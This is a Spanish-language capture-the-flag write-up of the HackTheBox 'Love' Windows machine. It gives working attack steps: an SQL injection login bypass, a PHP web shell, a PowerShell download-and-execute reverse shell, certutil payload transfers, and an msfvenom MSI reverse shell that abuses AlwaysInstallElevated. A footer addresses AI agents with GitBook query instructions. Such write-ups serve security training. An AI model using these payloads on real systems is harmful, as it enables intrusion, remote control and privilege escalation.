> For the complete documentation index, see [llms.txt](https://hacking-notes.jord4n.pro/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://hacking-notes.jord4n.pro/es/writeups-ctf/hackthebox/windows-easy/love-hackthebox-writeup.md).

# Resolución de HackTheBox Love

{% embed url="<https://app.hackthebox.com/machines/344>" %}

{% hint style="warning" %}
**Habilidades:**

* Inyección SQL (SQLI)
* Falsificación de solicitudes del lado del servidor (SSRF)
* Abuso de carga de archivos
* Explotación del sistema de votación
* Abusando de AlwaysInstallElevated (archivo msiexec/msi)
  {% endhint %}

## Reconocimiento

**Configuración del espacio de trabajo:**

Configura el espacio de trabajo creando tres carpetas para almacenar contenido importante, exploits y resultados de reconocimiento de Nmap.

<figure><img src="/files/e5186de6c455f80dc3bfddcf336dcd81d7e71909" alt="" width="563"><figcaption></figcaption></figure>

**Comprobación de conectividad VPN**

Comprueba la conectividad VPN para asegurar una comunicación estable con la máquina objetivo.

<figure><img src="/files/c9b2c8a3c7d3c55126bb99ca903c5fbde903c428" alt="" width="563"><figcaption></figcaption></figure>

**Descubrimiento de puertos abiertos con Nmap:** Explorando puertos abiertos y exportando en el archivo "allPorts" del directorio de Nmap:

```bash
nmap -p- --open -sS --min-rate 5000 -vvv -n -Pn 10.10.10.239 -oG allPorts
```

<figure><img src="/files/5ff7b516dab51604dfd0cc1f076fffce1e49e668" alt=""><figcaption></figcaption></figure>

**Análisis de puertos abiertos con extractport:** Uso de la función extractport para mostrar de forma concisa los puertos abiertos y copiarlos al portapapeles.

<figure><img src="/files/d6dd103925f989af527cc76bd70893a6db59e4fb" alt=""><figcaption></figcaption></figure>

**Escaneo de versiones de puertos con Nmap:** Usando Nmap para escanear versiones de puertos y extraer información en el archivo "targeted":

```bash
nmap -sCV -p80,135,139,443,445,3306,5000,5040,5985,5986,7680,47001,49664,49665,49666,49667,49668,49669,49670 10.10.10.239 -oN targeted
```

<div data-full-width="true"><figure><img src="/files/f45c645be39aa4371cf3f1db355e670ba6860bcc" alt=""><figcaption></figcaption></figure></div>

<div data-full-width="true"><figure><img src="/files/8cf1c412fe690e71f060238d0346d191b765f6fe" alt=""><figcaption></figcaption></figure></div>

Para resolver nombres de dominio a direcciones IP mediante DNS, se inserta el nombre de dominio asociado con su dirección IP en el `/etc/hosts` archivo

<figure><img src="/files/940fd6ebd346cd227ccadc98c1079ec505f9984a" alt="" width="563"><figcaption></figcaption></figure>

**Búsqueda de directorios:**

Usamos Gobuster para buscar directorios en el sitio:

```bash
gobuster dir -u http://love.htb -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 100
```

<figure><img src="/files/88ccce38f8a95a432248f0e35875d0ba4fe599f8" alt=""><figcaption></figcaption></figure>

En el `admin` directorio, descubrimos un panel de administración.

<figure><img src="/files/c39aa6c0333e8d1d584106252dabf0f48a8d0a94" alt=""><figcaption></figcaption></figure>

## Explotación del sistema de votación :

En este caso, hay dos formas de operar el panel de administración del sistema de votación:

### 1. Vulnerabilidad SSRF:

El puerto 443 revela un `staging.love.htb` subdominio que añadimos a nuestro `/etc/hosts` archivo.

<figure><img src="/files/096218f18847d77d014c5eb1bad071bf53fe9621" alt="" width="563"><figcaption></figcaption></figure>

Este sitio puede escanear sitios web mediante una URL.

<figure><img src="/files/3896d6308c852cc037b4afa20c850f3f54af9ebe" alt=""><figcaption></figcaption></figure>

Al escanear `localhost:5000` (no disponible desde fuera), descubrimos credenciales:

`admin: @LoveIsInTheAir!!!!`

<figure><img src="/files/e8b4cdfcab8999742f24a5fea9313309caba3cc9" alt=""><figcaption></figcaption></figure>

Nota: Desde fuera, se muestra el mensaje " You don't have permission to access this resource.", bloqueando el acceso.

<figure><img src="/files/dc56e8f8c0f26961c0b5036acc794d063e50c58c" alt="" width="563"><figcaption></figcaption></figure>

### **2. Vulnerabilidad de inyección SQL (**[**SQLi**](/es/web/sql-injection.md)**) :**

Con `searchsploit` buscamos vulnerabilidades específicas del sistema de votación y encontramos el siguiente payload:

<figure><img src="/files/e09ca838e9acf2125b4b85da8ac1560a3d37f3f7" alt=""><figcaption></figcaption></figure>

<div data-full-width="true"><figure><img src="/files/76132c4e7e7c3c2485b0dda393746265a479e74c" alt=""><figcaption></figcaption></figure></div>

`login=yea&password=admin&username=dsfgdf' UNION SELECT 1,2,"$2y$12$jRwyQyXnktvFrlryHNEhXOeKQYX7/5VK2ZdfB9f/GcJLuPahJWZ9K",4,5,6,7 from INFORMATION_SCHEMA.SCHEMATA;-- -`

Usando Burp Suite, accedemos al panel.

<figure><img src="/files/ed4e123978229c1e422cfcdda779c12c86047aec" alt=""><figcaption></figcaption></figure>

<figure><img src="/files/560c0918c6eb761f7df39e8854da9ed030c3c3a4" alt=""><figcaption></figcaption></figure>

## Vulnerabilidad de subida de archivos:

Una vez en el panel, una opción permite crear un nuevo usuario. Creamos un `cmd.php` archivo para ejecutar comandos en el servidor:

<figure><img src="/files/ddb278f33447db67fbdb755655ebca69de806cff" alt=""><figcaption></figcaption></figure>

```bash
<?php
echo "<pre>" . shell_exec($_REQUEST['cmd']) . "</pre>";
?>
```

<figure><img src="/files/32623e6511aef97254614d489283deb53859ad78" alt="" width="482"><figcaption></figcaption></figure>

El panel no aplica ninguna comprobación de seguridad, lo que nos permite inyectar comandos (por ejemplo, `whoami`). Probando un comando ping, comprobamos la conexión:

<figure><img src="/files/36c75d5c75123324c48f6e75d1bdb1bec10f2968" alt=""><figcaption></figcaption></figure>

comprobaremos si puede lanzar un ping

<pre class="language-bash"><code class="lang-bash">ping 10.10.14.10
<strong>tcpdump -i tun0 icmp
</strong></code></pre>

Al recibir la respuesta, confirmamos la posibilidad de ejecutar comandos en la máquina objetivo

<figure><img src="/files/c5ae0d257ee141f331d520baa9a58ce23d13b421" alt="" width="563"><figcaption></figcaption></figure>

**Comando de PowerShell para una shell inversa**

Una vez que veamos que podemos ejecutar comandos, descargaremos el `PS.ps1` script a nuestro equipo.

{% embed url="<https://raw.githubusercontent.com/samratashok/nishang/refs/heads/master/Shells/Invoke-PowerShellTcp.ps1>" %}

Al final del script, añadimos la siguiente línea:

```bash
Invoke-PowerShellTcp -Reverse -IPAddress 10.10.14.10 -Port 4444
```

<figure><img src="/files/5134ac122d5a76ab115979926b9ffe1188f3b126" alt=""><figcaption></figcaption></figure>

Crearemos un servidor web con el `PS.ps1` script

```bash
python3 -m http.server 80
```

Luego modificaremos el comando para que apunte a nuestro servidor web:

{% code overflow="wrap" %}

```bash
powershell "IEX(New-Object Net.WebClient).downloadString('http://10.10.14.10/PS.ps1')"
```

{% endcode %}

Finalmente, escuchamos en el puerto 4444:

```bash
rlwrap nc -nlvp 4444
```

<div data-full-width="true"><figure><img src="/files/c4b99ffdddba7c65955907aeb12a5cb05200bd99" alt=""><figcaption></figcaption></figure></div>

### Flag user.txt:

<figure><img src="/files/097c0156b86293f963d022fa59aa520c3dbf9649" alt=""><figcaption></figcaption></figure>

## Escalada de privilegios:

### **Enumeración con winPEASx64.exe** <a href="#enumeration-with-winpeasx64.exe" id="enumeration-with-winpeasx64.exe"></a>

Para realizar la escalada de privilegios en un servidor Windows, primero ejecuta la `winPEAS` herramienta de reconocimiento.

{% embed url="<https://github.com/peass-ng/PEASS-ng/releases/tag/20220214>" %}

Descargando la herramienta de reconocimiento WIN-peacex64.exe.

```purebasic
certutil.exe -f -urlcache -split http://10.10.14.10/winPEASx64.exe winPeas.exe
```

<figure><img src="/files/75277be1ad9be340f7dfb4f75d61abddc57beb2d" alt=""><figcaption></figcaption></figure>

```powershell
./winPEAS.exe
```

<figure><img src="/files/3d06349232f6d7619d5d8ddb5177d2d8226f2c2b" alt=""><figcaption></figcaption></figure>

### Comprobando AlwaysInstallElevated

El `winPEAS` la herramienta comprueba varios ajustes de seguridad del sistema. Nos interesa especialmente la `AlwaysInstallElevated` clave del registro. Si esta clave está configurada en `1` en `HKLM` (HKEY/ LOCAL/ MACHINE), esto indica que todos los `.msi` archivos pueden instalarse con privilegios elevados, lo cual es una vulnerabilidad.

<figure><img src="/files/9440758c7a8b7d8b030c90f8639d93b71dc7743e" alt=""><figcaption></figcaption></figure>

{% embed url="<https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#alwaysinstallelevated>" %}

**Crea un archivo .msi para obtener una shell inversa**

Para aprovechar esta vulnerabilidad, crearemos un `.msi` archivo que, una vez ejecutado, nos proporcionará una shell inversa. Usamos `msfvenom` para generar este archivo:

```bash
msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.10 LPORT=443 --platform windows -a x64 -f msi -o reverse.msi
```

**Transferencia desde .msi**/ archivo Después de crear el archivo, debemos transferirlo a la máquina objetivo:

```bash
certutil.exe -f -urlcache -split http://10.10.14.10/reverse.msi reverse.msi
```

<figure><img src="/files/530a38cd3a1151068de20327fc3279567ab4ebaf" alt=""><figcaption></figcaption></figure>

**Escuchar el puerto 443**/ Antes de ejecutar el `.msi` archivo, debemos escuchar en el puerto que hemos especificado. Usaremos `nc` (netcat) para ello:

```powershell
rlwrap nc -nlvp 443
```

**Ejecución del comando de instalación**/ Finalmente, ejecutamos el `.msi` archivo usando `msiexec`, lo que desencadena la instalación silenciosa:

```powershell
msiexec /quiet /qn /i reverse.msi
```

<figure><img src="/files/ea7cc41893950cfbbd3a5daec212704d38e267b6" alt=""><figcaption></figcaption></figure>

### Flag de root :)

<figure><img src="/files/63e26421e5cc9d67cd968dad273840e662d22753" alt="" width="563"><figcaption></figcaption></figure>

<figure><img src="/files/f3953ff675ae2c227b4c895a91557cd09e4dabea" alt="" width="524"><figcaption></figcaption></figure>


---

# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.

## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:

```
GET https://hacking-notes.jord4n.pro/es/writeups-ctf/hackthebox/windows-easy/love-hackthebox-writeup.md?ask=<question>&goal=<endgoal>
```

`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.

The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.
